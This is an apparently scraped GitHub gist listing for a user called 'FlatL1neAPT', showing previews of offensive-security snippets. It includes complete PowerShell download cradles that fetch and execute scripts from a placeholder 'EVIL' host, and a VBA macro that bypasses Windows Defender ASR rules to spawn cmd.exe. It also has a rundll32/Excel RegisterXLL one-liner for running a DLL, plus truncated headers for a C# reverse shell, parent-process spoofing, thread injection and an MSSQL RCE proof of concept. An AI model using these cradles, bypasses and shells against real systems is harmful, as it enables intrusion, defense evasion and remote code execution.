I hereby claim:
- I am FlatL1neAPT on github.
- I am underground (https://keybase.io/underground) on keybase.
- I have a public key whose fingerprint is E8D6 2068 1BD8 05A9 874A F718 02BC 1C2C 0C68 EDD1
To claim this, I am signing this object:
FlatL1neAPT
/ bad_sequel.py
Created
January 29, 2019 07:23
— forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a rough PoC | |
| # requirements for RCE: | |
| # - the attacker needs to either have or create an object with a service principal name | |
| # - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
| # - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
| # - NTLM has to be in use |
FlatL1neAPT
/ process_spoof.c
Created
January 23, 2019 14:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
| /* spoof.exe explorer.exe calc.exe */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
| typedef struct _STARTUPINFOEX { | |
| STARTUPINFO StartupInfo; | |
| LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
FlatL1neAPT
/ DownloadCradles.ps1
Created
January 15, 2019 13:36
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
FlatL1neAPT
/ keybase.md
Created
January 14, 2019 05:08
FlatL1neAPT
/ ASR Rules Bypass.vba
Created
January 11, 2019 14:47
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
FlatL1neAPT
/ excel.bat
Created
October 28, 2018 11:24
— forked from Ridter/excel.bat
Execute DLL via the Excel.Application object's RegisterXLL() method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
FlatL1neAPT
/ ExcelXLL.md
Created
October 28, 2018 11:24
— forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
FlatL1neAPT
/ Simple_Rev_Shell.cs
Created
October 28, 2018 11:20
— forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; | |
FlatL1neAPT
/ sedebug_rtlcreatethread.c
Created
October 28, 2018 11:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */ | |
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef DWORD(WINAPI *prototype_RtlCreateUserThread)( | |
| HANDLE ProcessHandle, | |
| PSECURITY_DESCRIPTOR SecurityDescriptor, | |
| BOOL CreateSuspended, | |
| ULONG StackZeroBits, | |
| PULONG StackReserved, |
FlatL1neAPT
/ CVE-2018-15542.txt
Created
October 28, 2018 11:04
— forked from tanprathan/CVE-2018-15542.txt
Telegram CVE-2018-15542 Information
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > [Description] | |
| > ** DISPUTED ** An issue was discovered in the org.telegram.messenger | |
| > application 4.8.11 for Android. The Passcode feature allows | |
| > authentication bypass via runtime manipulation that forces a certain | |
| > method's return value to true. In other words, an attacker could | |
| > authenticate with an arbitrary passcode. NOTE: the vendor indicates | |
| > that this is not an attack of interest within the context of their | |
| > threat model, which excludes Android devices on which rooting has | |
| > occurred. | |
| > |